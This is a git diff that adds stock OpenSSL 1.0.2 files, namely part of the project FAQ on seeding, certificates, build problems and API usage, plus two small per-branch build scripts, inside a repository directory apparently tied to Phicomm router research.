+for permission to use their software with OpenSSL.
+
+
+[USER] ========================================================================
+
+* Why do I get a "PRNG not seeded" error message?
+
+Cryptographic software needs a source of unpredictable data to work
+correctly.  Many open source operating systems provide a "randomness
+device" (/dev/urandom or /dev/random) that serves this purpose.
+All OpenSSL versions try to use /dev/urandom by default; starting with
+version 0.9.7, OpenSSL also tries /dev/random if /dev/urandom is not
+available.
+
+On other systems, applications have to call the RAND_add() or
+RAND_seed() function with appropriate data before generating keys or
+performing public key encryption. (These functions initialize the
+pseudo-random number generator, PRNG.)  Some broken applications do
+not do this.  As of version 0.9.5, the OpenSSL functions that need
+randomness report an error if the random number generator has not been
+seeded with at least 128 bits of randomness.  If this error occurs and
+is not discussed in the documentation of the application you are
+using, please contact the author of that application; it is likely
+that it never worked correctly.  OpenSSL 0.9.5 and later make the
+error visible by refusing to perform potentially insecure encryption.
+
+If you are using Solaris 8, you can add /dev/urandom and /dev/random
+devices by installing patch 112438 (Sparc) or 112439 (x86), which are
+available via the Patchfinder at <URL: http://sunsolve.sun.com>
+(Solaris 9 includes these devices by default). For /dev/random support
+for earlier Solaris versions, see Sun's statement at
+<URL: http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsrdb/27606&zone_32=SUNWski>
+(the SUNWski package is available in patch 105710).
+
+On systems without /dev/urandom and /dev/random, it is a good idea to
+use the Entropy Gathering Demon (EGD); see the RAND_egd() manpage for
+details.  Starting with version 0.9.7, OpenSSL will automatically look
+for an EGD socket at /var/run/egd-pool, /dev/egd-pool, /etc/egd-pool and
+/etc/entropy.
+
+Most components of the openssl command line utility automatically try
+to seed the random number generator from a file.  The name of the
+default seeding file is determined as follows: If environment variable
+RANDFILE is set, then it names the seeding file.  Otherwise if
+environment variable HOME is set, then the seeding file is $HOME/.rnd.
+If neither RANDFILE nor HOME is set, versions up to OpenSSL 0.9.6 will
+use file .rnd in the current directory while OpenSSL 0.9.6a uses no
+default seeding file at all.  OpenSSL 0.9.6b and later will behave
+similarly to 0.9.6a, but will use a default of "C:\" for HOME on
+Windows systems if the environment variable has not been set.
+
+If the default seeding file does not exist or is too short, the "PRNG
+not seeded" error message may occur.
+
+The openssl command line utility will write back a new state to the
+default seeding file (and create this file if necessary) unless
+there was no sufficient seeding.
+
+Pointing $RANDFILE to an Entropy Gathering Daemon socket does not work.
+Use the "-rand" option of the OpenSSL command line tools instead.
+The $RANDFILE environment variable and $HOME/.rnd are only used by the
+OpenSSL command line tools. Applications using the OpenSSL library
+provide their own configuration options to specify the entropy source,
+please check out the documentation coming the with application.
+
+
+* Why do I get an "unable to write 'random state'" error message?
+
+
+Sometimes the openssl command line utility does not abort with
+a "PRNG not seeded" error message, but complains that it is
+"unable to write 'random state'".  This message refers to the
+default seeding file (see previous answer).  A possible reason
+is that no default filename is known because neither RANDFILE
+nor HOME is set.  (Versions up to 0.9.6 used file ".rnd" in the
+current directory in this case, but this has changed with 0.9.6a.)
+
+
+* How do I create certificates or certificate requests?
+
+Check out the CA.pl(1) manual page. This provides a simple wrapper round
+the 'req', 'verify', 'ca' and 'pkcs12' utilities. For finer control check
+out the manual pages for the individual utilities and the certificate
+extensions documentation (in ca(1), req(1), x509v3_config(5) )
+
+
+* Why can't I create certificate requests?
+
+You typically get the error:
+
+	unable to find 'distinguished_name' in config
+	problems making Certificate Request
+
+This is because it can't find the configuration file. Check out the
+DIAGNOSTICS section of req(1) for more information.
+
+
+* Why does <SSL program> fail with a certificate verify error?
+
+This problem is usually indicated by log messages saying something like
+"unable to get local issuer certificate" or "self signed certificate".
+When a certificate is verified its root CA must be "trusted" by OpenSSL
+this typically means that the CA certificate must be placed in a directory
+or file and the relevant program configured to read it. The OpenSSL program
+'verify' behaves in a similar way and issues similar error messages: check
+the verify(1) program manual page for more information.
+
+
+* Why can I only use weak ciphers when I connect to a server using OpenSSL?
+
+This is almost certainly because you are using an old "export grade" browser
+which only supports weak encryption. Upgrade your browser to support 128 bit
+ciphers.
+
+
+* How can I create DSA certificates?
+
+Check the CA.pl(1) manual page for a DSA certificate example.
+
+
+* Why can't I make an SSL connection to a server using a DSA certificate?
+
+Typically you'll see a message saying there are no shared ciphers when
+the same setup works fine with an RSA certificate. There are two possible
+causes. The client may not support connections to DSA servers most web
+browsers (including Netscape and MSIE) only support connections to servers
+supporting RSA cipher suites. The other cause is that a set of DH parameters
+has not been supplied to the server. DH parameters can be created with the
+dhparam(1) command and loaded using the SSL_CTX_set_tmp_dh() for example:
+check the source to s_server in apps/s_server.c for an example.
+
+
+* How can I remove the passphrase on a private key?
+
+Firstly you should be really *really* sure you want to do this. Leaving
+a private key unencrypted is a major security risk. If you decide that
+you do have to do this check the EXAMPLES sections of the rsa(1) and
+dsa(1) manual pages.
+
+
+* Why can't I use OpenSSL certificates with SSL client authentication?
+
+What will typically happen is that when a server requests authentication
+it will either not include your certificate or tell you that you have
+no client certificates (Netscape) or present you with an empty list box
+(MSIE). The reason for this is that when a server requests a client
+certificate it includes a list of CAs names which it will accept. Browsers
+will only let you select certificates from the list on the grounds that
+there is little point presenting a certificate which the server will
+reject.
+
+The solution is to add the relevant CA certificate to your servers "trusted
+CA list". How you do this depends on the server software in uses. You can
+print out the servers list of acceptable CAs using the OpenSSL s_client tool:
+
+openssl s_client -connect www.some.host:443 -prexit
+
+If your server only requests certificates on certain URLs then you may need
+to manually issue an HTTP GET command to get the list when s_client connects:
+
+GET /some/page/needing/a/certificate.html
+
+If your CA does not appear in the list then this confirms the problem.
+
+
+* Why does my browser give a warning about a mismatched hostname?
+
+Browsers expect the server's hostname to match the value in the commonName
+(CN) field of the certificate. If it does not then you get a warning.
+
+
+* How do I install a CA certificate into a browser?
+
+The usual way is to send the DER encoded certificate to the browser as
+MIME type application/x-x509-ca-cert, for example by clicking on an appropriate
+link. On MSIE certain extensions such as .der or .cacert may also work, or you
+can import the certificate using the certificate import wizard.
+
+You can convert a certificate to DER form using the command:
+
+openssl x509 -in ca.pem -outform DER -out ca.der
+
+Occasionally someone suggests using a command such as:
+
+openssl pkcs12 -export -out cacert.p12 -in cacert.pem -inkey cakey.pem
+
+DO NOT DO THIS! This command will give away your CAs private key and
+reduces its security to zero: allowing anyone to forge certificates in
+whatever name they choose.
+
+* Why is OpenSSL x509 DN output not conformant to RFC2253?
+
+The ways to print out the oneline format of the DN (Distinguished Name) have
+been extended in version 0.9.7 of OpenSSL. Using the new X509_NAME_print_ex()
+interface, the "-nameopt" option could be introduded. See the manual
+page of the "openssl x509" commandline tool for details. The old behaviour
+has however been left as default for the sake of compatibility.
+
+* What is a "128 bit certificate"? Can I create one with OpenSSL?
+
+The term "128 bit certificate" is a highly misleading marketing term. It does
+*not* refer to the size of the public key in the certificate! A certificate
+containing a 128 bit RSA key would have negligible security.
+
+There were various other names such as "magic certificates", "SGC
+certificates", "step up certificates" etc.
+
+You can't generally create such a certificate using OpenSSL but there is no
+need to any more. Nowadays web browsers using unrestricted strong encryption
+are generally available.
+
+When there were tight restrictions on the export of strong encryption
+software from the US only weak encryption algorithms could be freely exported
+(initially 40 bit and then 56 bit). It was widely recognised that this was
+inadequate. A relaxation of the rules allowed the use of strong encryption but
+only to an authorised server.
+
+Two slighly different techniques were developed to support this, one used by
+Netscape was called "step up", the other used by MSIE was called "Server Gated
+Cryptography" (SGC). When a browser initially connected to a server it would
+check to see if the certificate contained certain extensions and was issued by
+an authorised authority. If these test succeeded it would reconnect using
+strong encryption.
+
+Only certain (initially one) certificate authorities could issue the
+certificates and they generally cost more than ordinary certificates.
+
+Although OpenSSL can create certificates containing the appropriate extensions
+the certificate would not come from a permitted authority and so would not
+be recognized.
+
+The export laws were later changed to allow almost unrestricted use of strong
+encryption so these certificates are now obsolete.
+
+
+* Why does OpenSSL set the authority key identifier (AKID) extension incorrectly?
+
+It doesn't: this extension is often the cause of confusion.
+
+Consider a certificate chain A->B->C so that A signs B and B signs C. Suppose
+certificate C contains AKID.
+
+The purpose of this extension is to identify the authority certificate B. This
+can be done either by including the subject key identifier of B or its issuer
+name and serial number.
+
+In this latter case because it is identifying certifcate B it must contain the
+issuer name and serial number of B.
+
+It is often wrongly assumed that it should contain the subject name of B. If it
+did this would be redundant information because it would duplicate the issuer
+name of C.
+
+
+* How can I set up a bundle of commercial root CA certificates?
+
+The OpenSSL software is shipped without any root CA certificate as the
+OpenSSL project does not have any policy on including or excluding
+any specific CA and does not intend to set up such a policy. Deciding
+about which CAs to support is up to application developers or
+administrators.
+
+Other projects do have other policies so you can for example extract the CA
+bundle used by Mozilla and/or modssl as described in this article:
+
+  <URL: http://www.mail-archive.com/modssl-users@modssl.org/msg16980.html>
+
+
+[BUILD] =======================================================================
+
+* Why does the linker complain about undefined symbols?
+
+Maybe the compilation was interrupted, and make doesn't notice that
+something is missing.  Run "make clean; make".
+
+If you used ./Configure instead of ./config, make sure that you
+selected the right target.  File formats may differ slightly between
+OS versions (for example sparcv8/sparcv9, or a.out/elf).
+
+In case you get errors about the following symbols, use the config
+option "no-asm", as described in INSTALL:
+
+ BF_cbc_encrypt, BF_decrypt, BF_encrypt, CAST_cbc_encrypt,
+ CAST_decrypt, CAST_encrypt, RC4, RC5_32_cbc_encrypt, RC5_32_decrypt,
+ RC5_32_encrypt, bn_add_words, bn_div_words, bn_mul_add_words,
+ bn_mul_comba4, bn_mul_comba8, bn_mul_words, bn_sqr_comba4,
+ bn_sqr_comba8, bn_sqr_words, bn_sub_words, des_decrypt3,
+ des_ede3_cbc_encrypt, des_encrypt, des_encrypt2, des_encrypt3,
+ des_ncbc_encrypt, md5_block_asm_host_order, sha1_block_asm_data_order
+
+If none of these helps, you may want to try using the current snapshot.
+If the problem persists, please submit a bug report.
+
+
+* Why does the OpenSSL test fail with "bc: command not found"?
+
+You didn't install "bc", the Unix calculator.  If you want to run the
+tests, get GNU bc from ftp://ftp.gnu.org or from your OS distributor.
+
+
+* Why does the OpenSSL test fail with "bc: 1 no implemented"?
+
+On some SCO installations or versions, bc has a bug that gets triggered
+when you run the test suite (using "make test").  The message returned is
+"bc: 1 not implemented".
+
+The best way to deal with this is to find another implementation of bc
+and compile/install it.  GNU bc (see <URL: http://www.gnu.org/software/software.html>
+for download instructions) can be safely used, for example.
+
+
+* Why does the OpenSSL test fail with "bc: stack empty"?
+
+On some DG/ux versions, bc seems to have a too small stack for calculations
+that the OpenSSL bntest throws at it.  This gets triggered when you run the
+test suite (using "make test").  The message returned is "bc: stack empty".
+
+The best way to deal with this is to find another implementation of bc
+and compile/install it.  GNU bc (see <URL: http://www.gnu.org/software/software.html>
+for download instructions) can be safely used, for example.
+
+
+* Why does the OpenSSL compilation fail on Alpha Tru64 Unix?
+
+On some Alpha installations running Tru64 Unix and Compaq C, the compilation
+of crypto/sha/sha_dgst.c fails with the message 'Fatal:  Insufficient virtual
+memory to continue compilation.'  As far as the tests have shown, this may be
+a compiler bug.  What happens is that it eats up a lot of resident memory
+to build something, probably a table.  The problem is clearly in the
+optimization code, because if one eliminates optimization completely (-O0),
+the compilation goes through (and the compiler consumes about 2MB of resident
+memory instead of 240MB or whatever one's limit is currently).
+
+There are three options to solve this problem:
+
+1. set your current data segment size soft limit higher.  Experience shows
+that about 241000 kbytes seems to be enough on an AlphaServer DS10.  You do
+this with the command 'ulimit -Sd nnnnnn', where 'nnnnnn' is the number of
+kbytes to set the limit to.
+
+2. If you have a hard limit that is lower than what you need and you can't
+get it changed, you can compile all of OpenSSL with -O0 as optimization
+level.  This is however not a very nice thing to do for those who expect to
+get the best result from OpenSSL.  A bit more complicated solution is the
+following:
+
+----- snip:start -----
+  make DIRS=crypto SDIRS=sha "`grep '^CFLAG=' Makefile.ssl | \
+       sed -e 's/ -O[0-9] / -O0 /'`"
+  rm `ls crypto/*.o crypto/sha/*.o | grep -v 'sha_dgst\.o'`
+  make
+----- snip:end -----
+
+This will only compile sha_dgst.c with -O0, the rest with the optimization
+level chosen by the configuration process.  When the above is done, do the
+test and installation and you're set.
+
+3. Reconfigure the toolkit with no-sha0 option to leave out SHA0. It 
+should not be used and is not used in SSL/TLS nor any other recognized
+protocol in either case.
+
+
+* Why does the OpenSSL compilation fail with "ar: command not found"?
+
+Getting this message is quite usual on Solaris 2, because Sun has hidden
+away 'ar' and other development commands in directories that aren't in
+$PATH by default.  One of those directories is '/usr/ccs/bin'.  The
+quickest way to fix this is to do the following (it assumes you use sh
+or any sh-compatible shell):
+
+----- snip:start -----
+  PATH=${PATH}:/usr/ccs/bin; export PATH
+----- snip:end -----
+
+and then redo the compilation.  What you should really do is make sure
+'/usr/ccs/bin' is permanently in your $PATH, for example through your
+'.profile' (again, assuming you use a sh-compatible shell).
+
+
+* Why does the OpenSSL compilation fail on Win32 with VC++?
+
+Sometimes, you may get reports from VC++ command line (cl) that it
+can't find standard include files like stdio.h and other weirdnesses.
+One possible cause is that the environment isn't correctly set up.
+To solve that problem for VC++ versions up to 6, one should run
+VCVARS32.BAT which is found in the 'bin' subdirectory of the VC++
+installation directory (somewhere under 'Program Files').  For VC++
+version 7 (and up?), which is also called VS.NET, the file is called
+VSVARS32.BAT instead.
+This needs to be done prior to running NMAKE, and the changes are only
+valid for the current DOS session.
+
+
+* What is special about OpenSSL on Redhat?
+
+Red Hat Linux (release 7.0 and later) include a preinstalled limited
+version of OpenSSL. Red Hat has chosen to disable support for IDEA, RC5 and
+MDC2 in this version. The same may apply to other Linux distributions.
+Users may therefore wish to install more or all of the features left out.
+
+To do this you MUST ensure that you do not overwrite the openssl that is in
+/usr/bin on your Red Hat machine. Several packages depend on this file,
+including sendmail and ssh. /usr/local/bin is a good alternative choice. The
+libraries that come with Red Hat 7.0 onwards have different names and so are
+not affected. (eg For Red Hat 7.2 they are /lib/libssl.so.0.9.6b and
+/lib/libcrypto.so.0.9.6b with symlinks /lib/libssl.so.2 and
+/lib/libcrypto.so.2 respectively).
+
+Please note that we have been advised by Red Hat attempting to recompile the
+openssl rpm with all the cryptography enabled will not work. All other
+packages depend on the original Red Hat supplied openssl package. It is also
+worth noting that due to the way Red Hat supplies its packages, updates to
+openssl on each distribution never change the package version, only the
+build number. For example, on Red Hat 7.1, the latest openssl package has
+version number 0.9.6 and build number 9 even though it contains all the
+relevant updates in packages up to and including 0.9.6b.
+
+A possible way around this is to persuade Red Hat to produce a non-US
+version of Red Hat Linux.
+
+
+* Why does the OpenSSL compilation fail on MacOS X?
+
+If the failure happens when trying to build the "openssl" binary, with
+a large number of undefined symbols, it's very probable that you have
+OpenSSL 0.9.6b delivered with the operating system (you can find out by
+running '/usr/bin/openssl version') and that you were trying to build
+OpenSSL 0.9.7 or newer.  The problem is that the loader ('ld') in
+MacOS X has a misfeature that's quite difficult to go around.
+Look in the file PROBLEMS for a more detailed explanation and for possible
+solutions.
+
+
+* Why does the OpenSSL test suite fail on MacOS X?
+
+If the failure happens when running 'make test' and the RC4 test fails,
+it's very probable that you have OpenSSL 0.9.6b delivered with the
+operating system (you can find out by running '/usr/bin/openssl version')
+and that you were trying to build OpenSSL 0.9.6d.  The problem is that
+the loader ('ld') in MacOS X has a misfeature that's quite difficult to
+go around and has linked the programs "openssl" and the test programs
+with /usr/lib/libcrypto.dylib and /usr/lib/libssl.dylib instead of the
+libraries you just built.
+Look in the file PROBLEMS for a more detailed explanation and for possible
+solutions.
+
+* Why does the OpenSSL test suite fail in BN_sqr test [on a 64-bit platform]?
+
+Failure in BN_sqr test is most likely caused by a failure to configure the
+toolkit for current platform or lack of support for the platform in question.
+Run './config -t' and './apps/openssl version -p'. Do these platform
+identifiers match? If they don't, then you most likely failed to run
+./config and you're hereby advised to do so before filing a bug report.
+If ./config itself fails to run, then it's most likely problem with your
+local environment and you should turn to your system administrator (or
+similar). If identifiers match (and/or no alternative identifier is
+suggested by ./config script), then the platform is unsupported. There might
+or might not be a workaround. Most notably on SPARC64 platforms with GNU
+C compiler you should be able to produce a working build by running
+'./config -m32'. I understand that -m32 might not be what you want/need,
+but the build should be operational. For further details turn to
+<openssl-dev@openssl.org>.
+
+* Why does OpenBSD-i386 build fail on des-586.s with "Unimplemented segment type"?
+
+As of 0.9.7 assembler routines were overhauled for position independence
+of the machine code, which is essential for shared library support. For
+some reason OpenBSD is equipped with an out-of-date GNU assembler which
+finds the new code offensive. To work around the problem, configure with
+no-asm (and sacrifice a great deal of performance) or patch your assembler
+according to <URL: http://www.openssl.org/~appro/gas-1.92.3.OpenBSD.patch>.
+For your convenience a pre-compiled replacement binary is provided at
+<URL: http://www.openssl.org/~appro/gas-1.92.3.static.aout.bin>.
+Reportedly elder *BSD a.out platforms also suffer from this problem and
+remedy should be same. Provided binary is statically linked and should be
+working across wider range of *BSD branches, not just OpenBSD.
+
+* Why does the OpenSSL test suite fail in sha512t on x86 CPU?
+
+If the test program in question fails withs SIGILL, Illegal Instruction
+exception, then you more than likely to run SSE2-capable CPU, such as
+Intel P4, under control of kernel which does not support SSE2
+instruction extentions. See accompanying INSTALL file and
+OPENSSL_ia32cap(3) documentation page for further information.
+
+* Why does compiler fail to compile sha512.c?
+
+OpenSSL SHA-512 implementation depends on compiler support for 64-bit
+integer type. Few elder compilers [ULTRIX cc, SCO compiler to mention a
+couple] lack support for this and therefore are incapable of compiling
+the module in question. The recommendation is to disable SHA-512 by
+adding no-sha512 to ./config [or ./Configure] command line. Another
+possible alternative might be to switch to GCC.
+
+* Test suite still fails, what to do?
+
+Another common reason for failure to complete some particular test is
+simply bad code generated by a buggy component in toolchain or deficiency
+in run-time environment. There are few cases documented in PROBLEMS file,
+consult it for possible workaround before you beat the drum. Even if you
+don't find solution or even mention there, do reserve for possibility of
+a compiler bug. Compiler bugs might appear in rather bizarre ways, they
+never make sense, and tend to emerge when you least expect them. In order
+to identify one, drop optimization level, e.g. by editing CFLAG line in
+top-level Makefile, recompile and re-run the test.
+
+* I think I've found a bug, what should I do?
+
+If you are a new user then it is quite likely you haven't found a bug and
+something is happening you aren't familiar with. Check this FAQ, the associated
+documentation and the mailing lists for similar queries. If you are still
+unsure whether it is a bug or not submit a query to the openssl-users mailing
+list.
+
+
+* I'm SURE I've found a bug, how do I report it?
+
+Bug reports with no security implications should be sent to the request
+tracker. This can be done by mailing the report to <rt@openssl.org> (or its
+alias <openssl-bugs@openssl.org>), please note that messages sent to the
+request tracker also appear in the public openssl-dev mailing list.
+
+The report should be in plain text. Any patches should be sent as
+plain text attachments because some mailers corrupt patches sent inline.
+If your issue affects multiple versions of OpenSSL check any patches apply
+cleanly and, if possible include patches to each affected version.
+
+The report should be given a meaningful subject line briefly summarising the
+issue. Just "bug in OpenSSL" or "bug in OpenSSL 0.9.8n" is not very helpful.
+
+By sending reports to the request tracker the bug can then be given a priority
+and assigned to the appropriate maintainer. The history of discussions can be
+accessed and if the issue has been addressed or a reason why not. If patches
+are only sent to openssl-dev they can be mislaid if a team member has to
+wade through months of old messages to review the discussion.
+
+See also <URL: http://www.openssl.org/support/rt.html>
+
+
+* I've found a security issue, how do I report it?
+
+If you think your bug has security implications then please send it to
+openssl-security@openssl.org if you don't get a prompt reply at least 
+acknowledging receipt then resend or mail it directly to one of the
+more active team members (e.g. Steve).
+
+Note that bugs only present in the openssl utility are not in general
+considered to be security issues. 
+
+[PROG] ========================================================================
+
+* Is OpenSSL thread-safe?
+
+Yes (with limitations: an SSL connection may not concurrently be used
+by multiple threads).  On Windows and many Unix systems, OpenSSL
+automatically uses the multi-threaded versions of the standard
+libraries.  If your platform is not one of these, consult the INSTALL
+file.
+
+Multi-threaded applications must provide two callback functions to
+OpenSSL by calling CRYPTO_set_locking_callback() and
+CRYPTO_set_id_callback(), for all versions of OpenSSL up to and
+including 0.9.8[abc...]. As of version 1.0.0, CRYPTO_set_id_callback()
+and associated APIs are deprecated by CRYPTO_THREADID_set_callback()
+and friends. This is described in the threads(3) manpage.
+
+* I've compiled a program under Windows and it crashes: why?
+
+This is usually because you've missed the comment in INSTALL.W32.
+Your application must link against the same version of the Win32
+C-Runtime against which your openssl libraries were linked.  The
+default version for OpenSSL is /MD - "Multithreaded DLL".
+
+If you are using Microsoft Visual C++'s IDE (Visual Studio), in
+many cases, your new project most likely defaulted to "Debug
+Singlethreaded" - /ML.  This is NOT interchangeable with /MD and your
+program will crash, typically on the first BIO related read or write
+operation.
+
+For each of the six possible link stage configurations within Win32,
+your application must link  against the same by which OpenSSL was
+built.  If you are using MS Visual C++ (Studio) this can be changed
+by:
+
+ 1. Select Settings... from the Project Menu.
+ 2. Select the C/C++ Tab.
+ 3. Select "Code Generation from the "Category" drop down list box
+ 4. Select the Appropriate library (see table below) from the "Use
+    run-time library" drop down list box.  Perform this step for both
+    your debug and release versions of your application (look at the
+    top left of the settings panel to change between the two)
+
+    Single Threaded           /ML        -  MS VC++ often defaults to
+                                            this for the release
+                                            version of a new project.
+    Debug Single Threaded     /MLd       -  MS VC++ often defaults to
+                                            this for the debug version
+                                            of a new project.
+    Multithreaded             /MT
+    Debug Multithreaded       /MTd
+    Multithreaded DLL         /MD        -  OpenSSL defaults to this.
+    Debug Multithreaded DLL   /MDd
+
+Note that debug and release libraries are NOT interchangeable.  If you
+built OpenSSL with /MD your application must use /MD and cannot use /MDd.
+
+As per 0.9.8 the above limitation is eliminated for .DLLs. OpenSSL
+.DLLs compiled with some specific run-time option [we insist on the
+default /MD] can be deployed with application compiled with different
+option or even different compiler. But there is a catch! Instead of
+re-compiling OpenSSL toolkit, as you would have to with prior versions,
+you have to compile small C snippet with compiler and/or options of
+your choice. The snippet gets installed as
+<install-root>/include/openssl/applink.c and should be either added to
+your application project or simply #include-d in one [and only one]
+of your application source files. Failure to link this shim module
+into your application manifests itself as fatal "no OPENSSL_Applink"
+run-time error. An explicit reminder is due that in this situation
+[mixing compiler options] it is as important to add CRYPTO_malloc_init
+prior first call to OpenSSL.
+
+* How do I read or write a DER encoded buffer using the ASN1 functions?
+
+You have two options. You can either use a memory BIO in conjunction
+with the i2d_*_bio() or d2i_*_bio() functions or you can use the
+i2d_*(), d2i_*() functions directly. Since these are often the
+cause of grief here are some code fragments using PKCS7 as an example:
+
+ unsigned char *buf, *p;
+ int len;
+
+ len = i2d_PKCS7(p7, NULL);
+ buf = OPENSSL_malloc(len); /* or Malloc, error checking omitted */
+ p = buf;
+ i2d_PKCS7(p7, &p);
+
+At this point buf contains the len bytes of the DER encoding of
+p7.
+
+The opposite assumes we already have len bytes in buf:
+
+ unsigned char *p;
+ p = buf;
+ p7 = d2i_PKCS7(NULL, &p, len);
+
+At this point p7 contains a valid PKCS7 structure or NULL if an error
+occurred. If an error occurred ERR_print_errors(bio) should give more
+information.
+
+The reason for the temporary variable 'p' is that the ASN1 functions
+increment the passed pointer so it is ready to read or write the next
+structure. This is often a cause of problems: without the temporary
+variable the buffer pointer is changed to point just after the data
+that has been read or written. This may well be uninitialized data
+and attempts to free the buffer will have unpredictable results
+because it no longer points to the same address.
+
+Memory allocation and encoding can also be combined in a single
+operation by the ASN1 routines:
+
+ unsigned char *buf = NULL;	/* mandatory */
+ int len;
+ len = i2d_PKCS7(p7, &buf);
+ if (len < 0)
+	/* Error */
+ /* Do some things with 'buf' */
+ /* Finished with buf: free it */
+ OPENSSL_free(buf);
+
+In this special case the "buf" parameter is *not* incremented, it points
+to the start of the encoding.
+
+
+* OpenSSL uses DER but I need BER format: does OpenSSL support BER?
+
+The short answer is yes, because DER is a special case of BER and OpenSSL
+ASN1 decoders can process BER.
+
+The longer answer is that ASN1 structures can be encoded in a number of
+different ways. One set of ways is the Basic Encoding Rules (BER) with various
+permissible encodings. A restriction of BER is the Distinguished Encoding
+Rules (DER): these uniquely specify how a given structure is encoded.
+
+Therefore, because DER is a special case of BER, DER is an acceptable encoding
+for BER.
+
+
+* I've tried using <M_some_evil_pkcs12_macro> and I get errors why?
+
+This usually happens when you try compiling something using the PKCS#12
+macros with a C++ compiler. There is hardly ever any need to use the
+PKCS#12 macros in a program, it is much easier to parse and create
+PKCS#12 files using the PKCS12_parse() and PKCS12_create() functions
+documented in doc/openssl.txt and with examples in demos/pkcs12. The
+'pkcs12' application has to use the macros because it prints out 
+debugging information.
+
+
+* I've called <some function> and it fails, why?
+
+Before submitting a report or asking in one of the mailing lists, you
+should try to determine the cause. In particular, you should call
+ERR_print_errors() or ERR_print_errors_fp() after the failed call
+and see if the message helps. Note that the problem may occur earlier
+than you think -- you should check for errors after every call where
+it is possible, otherwise the actual problem may be hidden because
+some OpenSSL functions clear the error state.
+
+
+* I just get a load of numbers for the error output, what do they mean?
+
+The actual format is described in the ERR_print_errors() manual page.
+You should call the function ERR_load_crypto_strings() before hand and
+the message will be output in text form. If you can't do this (for example
+it is a pre-compiled binary) you can use the errstr utility on the error
+code itself (the hex digits after the second colon).
+
+
+* Why do I get errors about unknown algorithms?
+
+The cause is forgetting to load OpenSSL's table of algorithms with
+OpenSSL_add_all_algorithms(). See the manual page for more information. This
+can cause several problems such as being unable to read in an encrypted
+PEM file, unable to decrypt a PKCS#12 file or signature failure when
+verifying certificates.
+
+* Why can't the OpenSSH configure script detect OpenSSL?
+
+Several reasons for problems with the automatic detection exist.
+OpenSSH requires at least version 0.9.5a of the OpenSSL libraries.
+Sometimes the distribution has installed an older version in the system
+locations that is detected instead of a new one installed. The OpenSSL
+library might have been compiled for another CPU or another mode (32/64 bits).
+Permissions might be wrong.
+
+The general answer is to check the config.log file generated when running
+the OpenSSH configure script. It should contain the detailed information
+on why the OpenSSL library was not detected or considered incompatible.
+
+
+* Can I use OpenSSL's SSL library with non-blocking I/O?
+
+Yes; make sure to read the SSL_get_error(3) manual page!
+
+A pitfall to avoid: Don't assume that SSL_read() will just read from
+the underlying transport or that SSL_write() will just write to it --
+it is also possible that SSL_write() cannot do any useful work until
+there is data to read, or that SSL_read() cannot do anything until it
+is possible to send data.  One reason for this is that the peer may
+request a new TLS/SSL handshake at any time during the protocol,
+requiring a bi-directional message exchange; both SSL_read() and
+SSL_write() will try to continue any pending handshake.
+
+
+* Why doesn't my server application receive a client certificate?
+
+Due to the TLS protocol definition, a client will only send a certificate,
+if explicitly asked by the server. Use the SSL_VERIFY_PEER flag of the
+SSL_CTX_set_verify() function to enable the use of client certificates.
+
+
+* Why does compilation fail due to an undefined symbol NID_uniqueIdentifier?
+
+For OpenSSL 0.9.7 the OID table was extended and corrected. In earlier
+versions, uniqueIdentifier was incorrectly used for X.509 certificates.
+The correct name according to RFC2256 (LDAP) is x500UniqueIdentifier.
+Change your code to use the new name when compiling against OpenSSL 0.9.7.
+
+
+* I think I've detected a memory leak, is this a bug?
+
+In most cases the cause of an apparent memory leak is an OpenSSL internal table
+that is allocated when an application starts up. Since such tables do not grow
+in size over time they are harmless.
+
+These internal tables can be freed up when an application closes using various
+functions.  Currently these include following:
+
+Thread-local cleanup functions:
+
+  ERR_remove_state()
+
+Application-global cleanup functions that are aware of usage (and therefore
+thread-safe):
+
+  ENGINE_cleanup() and CONF_modules_unload()
+
+"Brutal" (thread-unsafe) Application-global cleanup functions:
+
+  ERR_free_strings(), EVP_cleanup() and CRYPTO_cleanup_all_ex_data().
+
+
+* Why does Valgrind complain about the use of uninitialized data?
+
+When OpenSSL's PRNG routines are called to generate random numbers the supplied
+buffer contents are mixed into the entropy pool: so it technically does not
+matter whether the buffer is initialized at this point or not.  Valgrind (and
+other test tools) will complain about this. When using Valgrind, make sure the
+OpenSSL library has been compiled with the PURIFY macro defined (-DPURIFY)
+to get rid of these warnings.
+
+
+* Why doesn't a memory BIO work when a file does?
+
+This can occur in several cases for example reading an S/MIME email message.
+The reason is that a memory BIO can do one of two things when all the data
+has been read from it.
+
+The default behaviour is to indicate that no more data is available and that
+the call should be retried, this is to allow the application to fill up the BIO
+again if necessary.
+
+Alternatively it can indicate that no more data is available and that EOF has
+been reached.
+
+If a memory BIO is to behave in the same way as a file this second behaviour
+is needed. This must be done by calling:
+
+   BIO_set_mem_eof_return(bio, 0);
+
+See the manual pages for more details.
+
+
+* Where are the declarations and implementations of d2i_X509() etc?
+
+These are defined and implemented by macros of the form:
+
+
+ DECLARE_ASN1_FUNCTIONS(X509) and IMPLEMENT_ASN1_FUNCTIONS(X509)
+
+The implementation passes an ASN1 "template" defining the structure into an
+ASN1 interpreter using generalised functions such as ASN1_item_d2i().
+
+
+===============================================================================
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/GitConfigure b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/GitConfigure
new file mode 100755
index 0000000..bbab33e
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/GitConfigure
@@ -0,0 +1,8 @@
+#!/bin/sh
+
+BRANCH=`git rev-parse --abbrev-ref HEAD`
+
+./Configure $@ no-symlinks
+make files
+util/mk1mf.pl OUT=out.$BRANCH TMP=tmp.$BRANCH INC=inc.$BRANCH copy > makefile.$BRANCH
+make -f makefile.$BRANCH init
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/GitMake b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/GitMake
new file mode 100755
index 0000000..47beffd
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/GitMake
@@ -0,0 +1,5 @@
+#!/bin/sh
+
+BRANCH=`git rev-parse --abbrev-ref HEAD`
+
+make -f makefile.$BRANCH $@
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/INSTALL b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/INSTALL
new file mode 100644
index 0000000..1325079
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/INSTALL
@@ -0,0 +1,360 @@
+
+ INSTALLATION ON THE UNIX PLATFORM
+ ---------------------------------
+
